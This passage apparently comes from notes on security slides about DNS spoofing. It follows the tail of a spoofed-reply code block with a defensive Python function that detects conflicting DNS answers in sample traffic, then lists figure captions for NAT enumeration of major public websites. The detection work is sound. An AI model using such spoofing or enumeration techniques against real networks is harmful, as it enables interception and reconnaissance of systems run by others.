        return resp
```
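A detection-side counterpart, added here and not taken from the slides: a spoofed reply of this kind reaches the client alongside the legitimate server's reply, so one query ends up with two answers carrying different data. The record layout, the function name `conflicting_answers`, the time window and the sample values are assumptions for the illustration.

```python
from collections import defaultdict

# Constructed sample: (time_s, client, txid, qname, rdata, ttl) per DNS answer seen.
SAMPLE_ANSWERS = [
    (0.010, "10.0.0.5", 0x1A2B, "www.example.com.", "192.168.1.1", 10),
    (0.042, "10.0.0.5", 0x1A2B, "www.example.com.", "203.0.113.10", 3600),
    (1.500, "10.0.0.7", 0x0C0D, "mail.example.com.", "198.51.100.9", 300),
    (1.501, "10.0.0.7", 0x0C0D, "mail.example.com.", "198.51.100.9", 300),  # retransmit
]

def conflicting_answers(answers, window=2.0):
    """Return one alert per query answered more than once with different rdata."""
    seen = defaultdict(list)
    for t, client, txid, qname, rdata, ttl in sorted(answers):
        # DNS names are case-insensitive, so normalise before grouping.
        seen[(client, txid, qname.lower())].append((t, rdata, ttl))
    alerts = []
    for (client, txid, qname), replies in seen.items():
        first_t = replies[0][0]
        # Only replies close to the first one can belong to the same transaction.
        in_window = [r for r in replies if r[0] - first_t <= window]
        distinct = sorted({r[1] for r in in_window})
        if len(distinct) > 1:  # identical retransmissions are not flagged
            alerts.append({"client": client, "txid": txid, "qname": qname,
                           "first_rdata": in_window[0][1], "rdata_seen": distinct})
    return alerts
```

The first reply to arrive is the one a stub resolver normally accepts, which is why the alert records `first_rdata` separately from the full set.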
[Figure: NAT enumeration: www.apple.com]
[Figure: NAT enumeration: www.cisco.com]
[Figure: NAT enumeration: www.google.com]
[Figure: NAT enumeration: www.microsoft.com]
[Figure: NAT enumeration: www.yahoo.fr]
[Figure: NAT enumeration: www.kernel.org]